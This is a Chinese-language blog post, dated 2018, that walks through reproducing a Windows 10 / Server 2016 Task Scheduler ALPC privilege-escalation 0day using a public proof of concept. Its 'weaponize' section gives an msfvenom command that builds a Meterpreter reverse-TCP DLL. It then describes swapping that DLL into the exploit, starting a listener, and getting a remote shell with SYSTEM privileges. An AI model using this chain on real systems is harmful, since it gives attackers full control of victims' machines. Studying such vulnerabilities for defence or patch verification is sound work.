windows-提权0day-复现 Writing 创建时间:2018-08-31 12:20 阅读: 前言:正文将其武器化 前言: win10中任务调度服务导出的函数没有验证调用者的权限,任意权限的用户调用该函数可以获取系统敏感文件的写权限,进而提权。影响范围:windows10,windows server 2016昨天群里的基友们都复现了一遍也都成功了,也有基友在windows8实验了发现了也能提权成功。 正文准备工作:下载POC,windows 10 镜像,Process Explorer,CFFPOC:GitHub - SandboxEscaper/randomrepo: Repo for random stuffwindows10 ISO:msdn下载Process Explorer:Process Explorer - Windows Sysinternals | Microsoft DocsCFF:Explorer Suite – NTCore 首先打开一个notepad并没有什么不同,执行带有子进程conhost和notepad的cmd.exe已经生成为SYSTEM! 将其武器化在kali执行 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll > ka.dll移动到windows10在CFF打开ALPC-TaskSched-LPE.dll替换其msf生成的dll,然后保存 kali中执行监听命令windows 10中执行返回kali可以发现已经成功的反弹了一个meterpreter,并且是system权限 分析此0day的文章:漏洞预警 | Windows 10本地提权0day预警 - 安全客,安全资讯平台转载请注明来自:422926799.github.io 转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。